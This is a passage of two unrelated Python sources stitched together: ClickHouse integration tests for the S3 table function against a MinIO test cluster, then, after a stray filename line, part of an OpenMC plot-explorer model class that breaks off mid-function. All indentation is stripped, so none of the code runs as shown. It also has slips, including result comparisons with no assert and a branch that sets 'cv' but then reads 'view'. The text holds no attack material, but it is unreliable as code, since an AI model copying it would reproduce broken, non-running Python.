bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format, values)
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(cluster, bucket, filename)
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
"'minio','minio123',"
])
def test_empty_put(cluster, auth):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
cluster.minio_host, cluster.minio_port, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
cluster.minio_host, cluster.minio_port, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
("'minio','minio123',", True),
("'wrongid','wrongkey',", False)
])
def test_put_csv(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_host, cluster.minio_port, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(cluster):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
("", True),
# ("'minio','minio123',",True), Redirect with credentials not working with nginx.
("'wrongid','wrongkey',", False),
])
def test_multipart_put(cluster, maybe_auth, positive):
# type: (ClickHouseCluster) -> None
bucket = cluster.minio_bucket if not maybe_auth else cluster.minio_restricted_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
# Minimum size of part is 5 Mb for Minio.
# See: https://github.com/minio/minio/blob/master/docs/minio-limits.md
min_part_size_bytes = 5 * 1024 * 1024
csv_size_bytes = int(min_part_size_bytes * 1.5) # To have 2 parts.
one_line_length = 6 # 3 digits, 2 commas, 1 line separator.
# Generate data having size more than one part
int_data = [[1, 2, 3] for i in range(csv_size_bytes // one_line_length)]
csv_data = "".join(["{},{},{}\n".format(x, y, z) for x, y, z in int_data])
assert len(csv_data) > min_part_size_bytes
filename = "test_multipart.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, filename, maybe_auth, table_format)
try:
run_query(instance, put_query, stdin=csv_data, settings={'s3_min_upload_part_size': min_part_size_bytes,
's3_max_single_part_upload_size': 0})
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
# Use proxy access logs to count number of parts uploaded to Minio.
proxy_logs = cluster.get_container_logs("proxy1") # type: str
assert proxy_logs.count("PUT /{}/{}".format(bucket, filename)) >= 2
assert csv_data == get_s3_file_content(cluster, bucket, filename)
def test_remote_host_filter(cluster):
instance = cluster.instances["restricted_dummy"]
format = "column1 UInt32, column2 UInt32, column3 UInt32"
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/test.csv', 'CSV', '{}')".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
other_values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
query = "insert into table function s3('http://{}:{}/{}/test.csv', 'CSV', '{}') values {}".format(
"invalid_host", cluster.minio_port, cluster.minio_bucket, format, other_values)
assert "not allowed in config.xml" in instance.query_and_get_error(query)
@pytest.mark.parametrize("s3_storage_args", [
"''", # 1 arguments
"'','','','','',''" # 6 arguments
])
def test_wrong_s3_syntax(cluster, s3_storage_args):
instance = cluster.instances["dummy"] # type: ClickHouseInstance
expected_err_msg = "Code: 42" # NUMBER_OF_ARGUMENTS_DOESNT_MATCH
query = "create table test_table_s3_syntax (id UInt32) ENGINE = S3({})".format(s3_storage_args)
assert expected_err_msg in instance.query_and_get_error(query)
# https://en.wikipedia.org/wiki/One_Thousand_and_One_Nights
def test_s3_glob_scheherazade(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
values = "(1, 1, 1)"
nights_per_job = 1001 // 30
jobs = []
for night in range(0, 1001, nights_per_job):
def add_tales(start, end):
for i in range(start, end):
path = "night_{}/tale.csv".format(i)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
cluster.minio_host, cluster.minio_port, bucket, path, table_format, values)
run_query(instance, query)
jobs.append(threading.Thread(target=add_tales, args=(night, min(night + nights_per_job, 1001))))
jobs[-1].start()
for job in jobs:
job.join()
query = "select count(), sum(column1), sum(column2), sum(column3) from s3('http://{}:{}/{}/night_*/tale.csv', 'CSV', '{}')".format(
cluster.minio_redirect_host, cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == ["1001\t1001\t1001\t1001"]
def run_s3_mock(cluster):
logging.info("Starting s3 mock")
container_id = cluster.get_container_id('resolver')
current_dir = os.path.dirname(__file__)
cluster.copy_file_to_container(container_id, os.path.join(current_dir, "s3_mock", "mock_s3.py"), "mock_s3.py")
cluster.exec_in_container(container_id, ["python", "mock_s3.py"], detach=True)
# Wait for S3 mock start
for attempt in range(10):
ping_response = cluster.exec_in_container(cluster.get_container_id('resolver'),
["curl", "-s", "http://resolver:8080/"], nothrow=True)
if ping_response != 'OK':
if attempt == 9:
assert ping_response == 'OK', 'Expected "OK", but got "{}"'.format(ping_response)
else:
time.sleep(1)
else:
break
logging.info("S3 mock started")
def replace_config(old, new):
config = open(CONFIG_PATH, 'r')
config_lines = config.readlines()
config.close()
config_lines = [line.replace(old, new) for line in config_lines]
config = open(CONFIG_PATH, 'w')
config.writelines(config_lines)
config.close()
def test_custom_auth_headers(cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=cluster.minio_restricted_bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
result = run_query(instance, get_query)
assert result == '1\t2\t3\n'
instance.query(
"CREATE TABLE test ({table_format}) ENGINE = S3('http://resolver:8080/{bucket}/{file}', 'CSV')".format(
bucket=cluster.minio_restricted_bucket,
file=filename,
table_format=table_format
))
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
replace_config("<header>Authorization: Bearer TOKEN", "<header>Authorization: Bearer INVALID_TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
ret, err = instance.query_and_get_answer_with_error("SELECT * FROM test")
assert ret == "" and err != ""
replace_config("<header>Authorization: Bearer INVALID_TOKEN", "<header>Authorization: Bearer TOKEN")
instance.query("SYSTEM RELOAD CONFIG")
assert run_query(instance, "SELECT * FROM test") == '1\t2\t3\n'
def test_custom_auth_headers_exclusion(cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert '403 Forbidden' in ei.value.stderr
def test_infinite_redirect(cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = "select * from s3('http://resolver:8080/{bucket}/{file}', 'CSV', '{table_format}')".format(
bucket=bucket,
file=filename,
table_format=table_format)
instance = cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
("bin", "gzip"),
("gz", "auto")
])
def test_storage_s3_get_gzip(cluster, extension, method):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = "test_get_gzip"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(cluster, bucket, filename, buf.getvalue())
try:
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{cluster.minio_host}:{cluster.minio_port}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["565"]
finally:
run_query(instance, f"DROP TABLE {name}")
def test_storage_s3_put_uncompressed(cluster):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
try:
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, cluster.minio_host, cluster.minio_port, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
finally:
run_query(instance, f"DROP TABLE {name}")
@pytest.mark.parametrize("extension,method", [
("bin", "gzip"),
("gz", "auto")
])
def test_storage_s3_put_gzip(cluster, extension, method):
bucket = cluster.minio_bucket
instance = cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = "test_put_gzip"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
try:
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{cluster.minio_host}:{cluster.minio_port}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
finally:
run_query(instance, f"DROP TABLE {name}")
|
plotmodel.py
|
from ast import literal_eval
from collections import defaultdict
import copy
import itertools
import threading
from PySide2.QtWidgets import QItemDelegate, QColorDialog, QLineEdit, QMessageBox
from PySide2.QtCore import QAbstractTableModel, QModelIndex, Qt, QSize, QEvent
from PySide2.QtGui import QColor
import openmc
import openmc.lib
import numpy as np
from .statepointmodel import StatePointModel
from .plot_colors import random_rgb, reset_seed
ID, NAME, COLOR, COLORLABEL, MASK, HIGHLIGHT = tuple(range(0, 6))
__VERSION__ = "0.2.1"
_VOID_REGION = -1
_NOT_FOUND = -2
_OVERLAP = -3
_MODEL_PROPERTIES = ('temperature', 'density')
_PROPERTY_INDICES = {'temperature': 0, 'density': 1}
_REACTION_UNITS = 'Reactions per Source Particle'
_FLUX_UNITS = 'Particle-cm per Source Particle'
_PRODUCTION_UNITS = 'Particles Produced per Source Particle'
_ENERGY_UNITS = 'eV per Source Particle'
_SPATIAL_FILTERS = (openmc.UniverseFilter,
openmc.MaterialFilter,
openmc.CellFilter,
openmc.MeshFilter)
_PRODUCTIONS = ('delayed-nu-fission', 'prompt-nu-fission', 'nu-fission',
'nu-scatter', 'H1-production', 'H2-production',
'H3-production', 'He3-production', 'He4-production')
_SCORE_UNITS = {p: _PRODUCTION_UNITS for p in _PRODUCTIONS}
_SCORE_UNITS['flux'] = 'Particle-cm/Particle'
_SCORE_UNITS['current'] = 'Particles per source Particle'
_SCORE_UNITS['events'] = 'Events per Source Particle'
_SCORE_UNITS['inverse-velocity'] = 'Particle-seconds per Source Particle'
_SCORE_UNITS['heating'] = _ENERGY_UNITS
_SCORE_UNITS['heating-local'] = _ENERGY_UNITS
_SCORE_UNITS['kappa-fission'] = _ENERGY_UNITS
_SCORE_UNITS['fission-q-prompt'] = _ENERGY_UNITS
_SCORE_UNITS['fission-q-recoverable'] = _ENERGY_UNITS
_SCORE_UNITS['decay-rate'] = 'Seconds^-1'
_SCORE_UNITS['damage-energy'] = _ENERGY_UNITS
_TALLY_VALUES = {'Mean': 'mean',
'Std. Dev.': 'std_dev',
'Rel. Error': 'rel_err'}
class PlotModel():
""" Geometry and plot settings for OpenMC Plot Explorer model
Attributes
----------
geom : openmc.Geometry instance
OpenMC Geometry of the model
modelCells : collections.OrderedDict
Dictionary mapping cell IDs to openmc.Cell instances
modelMaterials : collections.OrderedDict
Dictionary mapping material IDs to openmc.Material instances
ids : NumPy int array (v_res, h_res, 1)
Mapping of plot coordinates to cell/material ID by pixel
image : NumPy int array (v_res, h_res, 3)
The current RGB image data
statepoint : StatePointModel
Simulation data model used to display tally results
applied_filters : tuple of ints
IDs of the applied filters for the displayed tally
previousViews : list of PlotView instances
List of previously created plot view settings used to undo
changes made in plot explorer
subsequentViews : list of PlotView instances
List of undone plot view settings used to redo changes made
in plot explorer
defaultView : PlotView instance
Default settings for given geometry
currentView : PlotView instance
Currently displayed plot settings in plot explorer
activeView : PlotView instance
Active state of settings in plot explorer, which may or may not
have unapplied changes
"""
def __init__(self):
""" Initialize PlotModel class attributes """
# Retrieve OpenMC Cells/Materials
self.modelCells = openmc.lib.cells
self.modelMaterials = openmc.lib.materials
self.max_universe_levels = openmc.lib._coord_levels()
# Cell/Material ID by coordinates
self.ids = None
self.instances = None
self.version = __VERSION__
# default statepoint value
self._statepoint = None
# default tally/filter info
self.appliedFilters = ()
self.appliedScores = ()
self.appliedNuclides = ()
# reset random number seed for consistent
# coloring when reloading a model
reset_seed()
self.previousViews = []
self.subsequentViews = []
self.defaultView = self.getDefaultView()
self.currentView = copy.deepcopy(self.defaultView)
self.activeView = copy.deepcopy(self.defaultView)
def openStatePoint(self, filename):
self.statepoint = StatePointModel(filename, open_file=True)
@property
def statepoint(self):
return self._statepoint
@statepoint.setter
def statepoint(self, statepoint):
if statepoint is None:
self._statepoint = None
elif isinstance(statepoint, StatePointModel):
self._statepoint = statepoint
elif isinstance(statepoint, str):
self._statepoint = StatePointModel(statepoint, open_file=True)
else:
raise TypeError("Invalid statepoint object")
if self._statepoint and not self._statepoint.is_open:
self._statepoint.open()
def getDefaultView(self):
""" Generates default PlotView instance for OpenMC geometry
Centers plot view origin in every dimension if possible. Defaults
to xy basis, with height and width to accomodate full size of
geometry. Defaults to (0, 0, 0) origin with width and heigth of
25 if geometry bounding box cannot be generated.
Returns
-------
default : PlotView instance
PlotView instance with default view settings
"""
lower_left, upper_right = openmc.lib.global_bounding_box()
# Check for valid bounding_box dimensions
if -np.inf not in lower_left[:2] and np.inf not in upper_right[:2]:
xcenter = (upper_right[0] + lower_left[0])/2
width = abs(upper_right[0] - lower_left[0]) * 1.005
ycenter = (upper_right[1] + lower_left[1])/2
height = abs(upper_right[1] - lower_left[1]) * 1.005
else:
xcenter, ycenter, width, height = (0.00, 0.00, 25, 25)
if lower_left[2] != -np.inf and upper_right[2] != np.inf:
zcenter = (upper_right[2] + lower_left[2])/2
else:
zcenter = 0.00
default = PlotView([xcenter, ycenter, zcenter], width, height)
return default
def resetColors(self):
""" Reset colors to those generated in the default view """
self.activeView.cells = self.defaultView.cells
self.activeView.materials = self.defaultView.materials
def generatePlot(self):
""" Spawn thread from which to generate new plot image """
t = threading.Thread(target=self.makePlot)
t.start()
t.join()
def makePlot(self):
""" Generate new plot image from active view settings
Creates corresponding .xml files from user-chosen settings.
Runs OpenMC in plot mode to generate new plot image.
"""
cv = self.currentView = copy.deepcopy(self.activeView)
ids = openmc.lib.id_map(cv)
props = openmc.lib.property_map(cv)
self.cell_ids = ids[:, :, 0]
self.instances = ids[:, :, 1]
self.mat_ids = ids[:, :, 2]
# set model ids based on domain
if cv.colorby == 'cell':
self.ids = self.cell_ids
domain = cv.cells
source = self.modelCells
else:
self.ids = self.mat_ids
domain = cv.materials
source = self.modelMaterials
# generate colors if not present
for cell_id, cell in cv.cells.items():
if cell.color is None:
cell.color = random_rgb()
for mat_id, mat in cv.materials.items():
if mat.color is None:
mat.color = random_rgb()
# construct image data
domain[_OVERLAP] = DomainView(_OVERLAP, "Overlap", cv.overlap_color)
domain[_NOT_FOUND] = DomainView(_NOT_FOUND, "Not Found", cv.domainBackground)
u, inv = np.unique(self.ids, return_inverse=True)
image = np.array([domain[id].color for id in u])[inv]
image.shape = (cv.v_res, cv.h_res, 3)
if cv.masking:
for id, dom in domain.items():
if dom.masked:
image[self.ids == int(id)] = cv.maskBackground
if cv.highlighting:
for id, dom in domain.items():
if dom.highlight:
image[self.ids == int(id)] = cv.highlightBackground
# set model image
self.image = image
# set model properties
self.properties = props
# tally data
self.tally_data = None
self.properties[self.properties < 0.0] = np.nan
self.temperatures = self.properties[..., _PROPERTY_INDICES['temperature']]
self.densities = self.properties[..., _PROPERTY_INDICES['density']]
minmax = {}
for prop in _MODEL_PROPERTIES:
idx = _PROPERTY_INDICES[prop]
prop_data = self.properties[:, :, idx]
minmax[prop] = (np.min(np.nan_to_num(prop_data)),
np.max(np.nan_to_num(prop_data)))
self.activeView.data_minmax = minmax
def undo(self):
""" Revert to previous PlotView instance. Re-generate plot image """
if self.previousViews:
self.subsequentViews.append(copy.deepcopy(self.currentView))
self.activeView = self.previousViews.pop()
self.generatePlot()
def redo(self):
""" Revert to subsequent PlotView instance. Re-generate plot image """
if self.subsequentViews:
self.storeCurrent()
self.activeView = self.subsequentViews.pop()
self.generatePlot()
def storeCurrent(self):
""" Add current view to previousViews list """
self.previousViews.append(copy.deepcopy(self.currentView))
def create_tally_image(self, view=None):
if view is None:
view = self.currentView
tally_id = view.selectedTally
scores = self.appliedScores
nuclides = self.appliedNuclides
tally_selected = view.selectedTally is not None
tally_visible = view.tallyDataVisible
visible_selection = scores and nuclides
if not tally_selected or not tally_visible or not visible_selection:
return (None, None, None, None, None)
tally = self.statepoint.tallies[tally_id]
tally_value = _TALLY_VALUES[view.tallyValue]
# check score units
units = {_SCORE_UNITS.get(score, _REACTION_UNITS) for score in scores}
if len(units) != 1:
msg_box = QMessageBox()
unit_str = " ".join(units)
msg = "The scores selected have incompatible units:\n"
for unit in units:
msg += " - {}\n".format(unit)
msg_box.setText(msg)
msg_box.setIcon(QMessageBox.Information)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
return (None, None, None, None, None)
units_out = list(units)[0]
if tally.contains_filter(openmc.MeshFilter):
if tally_value == 'rel_err':
# get both the std. dev. data and mean data
# to create the relative error data
mean_data = self._create_tally_mesh_image(tally,
'mean',
scores,
nuclides,
view)
std_dev_data = self._create_tally_mesh_image(tally,
'std_dev',
scores,
nuclides,
view)
image_data = 100 * np.divide(std_dev_data[0],
mean_data[0],
out=np.zeros_like(mean_data[0]),
where=mean_data != 0)
extents = mean_data[1]
data_min = np.min(image_data)
data_max = np.max(image_data)
return image_data, extents, data_min, data_max, '% error'
else:
image = self._create_tally_mesh_image(tally,
tally_value,
scores,
nuclides,
view)
return image + (units_out,)
else:
# same as above, get the std. dev. data
# and mean date to produce the relative error data
if tally_value == 'rel_err':
mean_data = self._create_tally_domain_image(tally,
'mean',
scores,
nuclides,
view)
std_dev_data = self._create_tally_domain_image(tally,
'std_dev',
scores,
nuclides,
view)
image_data = 100 * np.divide(std_dev_data[0],
mean_data[0],
out=np.zeros_like(mean_data[0]),
where=mean_data != 0)
# adjust for NaNs in bins without tallies
image_data = np.nan_to_num(image_data,
nan=0.0,
posinf=0.0,
neginf=0.0)
extents = mean_data[1]
data_min = np.min(image_data)
data_max = np.max(image_data)
return image_data, extents, data_min, data_max, '% error'
else:
image = self._create_tally_domain_image(tally,
tally_value,
scores,
nuclides,
view)
return image + (units_out,)
def _create_tally_domain_image(self, tally, tally_value, scores, nuclides, view=None):
# data resources used throughout
if view is None:
view = self.currentView
data = tally.get_reshaped_data(tally_value)
data_out = np.full(self.ids.shape, -1.0)
def _do_op(array, tally_value, ax=0):
if tally_value == 'mean':
return np.sum(array, axis=ax)
elif tally_value == 'std_dev':
return np.sqrt(np.sum(array**2, axis=ax))
# data structure for tracking which spatial
# filter bins are enabled
spatial_filter_bins = defaultdict(list)
n_spatial_filters = 0
for tally_filter in tally.filters:
if tally_filter in self.appliedFilters:
selected_bins = self.appliedFilters[tally_filter]
if type(tally_filter) in _SPATIAL_FILTERS:
spatial_filter_bins[tally_filter] = selected_bins
n_spatial_filters += 1
else:
slc = [slice(None)] * len(data.shape)
slc[n_spatial_filters] = selected_bins
slc = tuple(slc)
data = _do_op(data[slc], tally_value, n_spatial_filters)
else:
data[:, ...] = 0.0
data = _do_op(data, tally_value, n_spatial_filters)
# filter by selected scores
selected_scores = []
for idx, score in enumerate(tally.scores):
if score in scores:
selected_scores.append(idx)
data = _do_op(data[..., np.array(selected_scores)], tally_value, -1)
# filter by selected nuclides
selected_nuclides = []
for idx, nuclide in enumerate(tally.nuclides):
if nuclide in nuclides:
selected_nuclides.append(idx)
data = _do_op(data[..., np.array(selected_nuclides)], tally_value, -1)
# get data limits
data_min = np.min(data)
data_max = np.max(data)
# for all combinations of spatial bins, create a mask
# and set image data values
spatial_filters = list(spatial_filter_bins.keys())
spatial_bins = list(spatial_filter_bins.values())
for bin_indices in itertools.product(*spatial_bins):
# look up the tally value
tally_val = data[bin_indices]
if tally_val == 0.0:
continue
# generate a mask with the correct size
mask = np.full(self.ids.shape, True, dtype=bool)
for tally_filter, bin_idx in zip(spatial_filters, bin_indices):
bin = tally_filter.bins[bin_idx]
if isinstance(tally_filter, openmc.CellFilter):
mask &= self.cell_ids == bin
elif isinstance(tally_filter, openmc.MaterialFilter):
mask &= self.mat_ids == bin
elif isinstance(tally_filter, openmc.UniverseFilter):
# get the statepoint summary
univ_cells = self.statepoint.universes[bin].cells
for cell in univ_cells:
mask &= self.cell_ids == cell
# set image data values
data_out[mask] = tally_val
# mask out invalid values
image_data = np.ma.masked_where(data_out < 0.0, data_out)
return image_data, None, data_min, data_max
def _create_tally_mesh_image(self, tally, tally_value, scores, nuclides, view=None):
# some variables used throughout
if view is None:
cv = self.currentView
sp = self.statepoint
mesh_filter = tally.find_filter(openmc.MeshFilter)
mesh = mesh_filter.mesh
def _do_op(array, tally_value, ax=0):
if tally_value == 'mean':
return np.sum(array, axis=ax)
elif tally_value == 'std_dev':
return np.sqrt(np.sum(array**2, axis=ax))
# start with reshaped data
data = tally.get_reshaped_data(tally_value)
# determine basis indices
if view.basis == 'xy':
h_ind = 0
v_ind = 1
ax = 2
elif view.basis == 'yz':
h_ind = 1
v_ind = 2
ax = 0
else:
h_ind = 0
v_ind = 2
ax = 1
# adjust corners of the mesh for a translation
# applied to the mesh filter
lower_left = mesh.lower_left
upper_right = mesh.upper_right
width = mesh.width
dimension = mesh.dimension
if hasattr(mesh_filter, 'translation') and mesh_filter.translation is not None:
lower_left += mesh_filter.translation
upper_right += mesh_filter.translation
# For 2D meshes, add an extra z dimension
if len(mesh.dimension) == 2:
lower_left = np.hstack((lower_left, -1e50))
upper_right = np.hstack((upper_right, 1e50))
width = np.hstack((width, 2e50))
dimension = np.hstack((dimension, 1))
# reduce data to the visible slice of the mesh values
k = int((view.origin[ax] - lower_left[ax]) // width[ax])
# setup slice
data_slice = [None, None, None]
data_slice[h_ind] = slice(dimension[h_ind])
data_slice[v_ind] = slice(dimension[v_ind])
data_slice[ax] = k
if k < 0 or k > dimension[ax]:
return (None, None, None, None)
# move mesh axes to the end of the filters
filter_idx = [type(filter) for filter in tally.filters].index(openmc.MeshFilter)
data = np.moveaxis(data, filter_idx, -1)
# reshape data (with zyx ordering for mesh data)
data = data.reshape(data.shape[:-1] + tuple(dimension[::-1]))
data = data[..., data_slice[2], data_slice[1], data_slice[0]]
# sum over the rest of the tally filters
for tally_filter in tally.filters:
if type(tally_filter) == openmc.MeshFilter:
continue
if tally_filter in self.appliedFilters:
selected_bins = self.appliedFilters[tally_filter]
# sum filter data for the selected bins
data = data[np.array(selected_bins)].sum(axis=0)
else:
# if the filter is completely unselected,
# set all of it's data to zero and remove the axis
data[:, ...] = 0.0
data = _do_op(data, tally_value)
# filter by selected nuclides
if not nuclides:
data = 0.0
selected_nuclides = []
for idx, nuclide in enumerate(tally.nuclides):
if nuclide in nuclides:
selected_nuclides.append(idx)
data = _do_op(data[np.array(selected_nuclides)], tally_value)
# filter by selected scores
if not scores:
data = 0.0
selected_scores = []
for idx, score in enumerate(tally.scores):
if score in scores:
selected_scores.append(idx)
data = _do_op(data[np.array(selected_scores)], tally_value)
# get dataset's min/max
data_min = np.min(data)
data_max = np.max(data)
# set image data, reverse y-axis
image_data = data[::-1, ...]
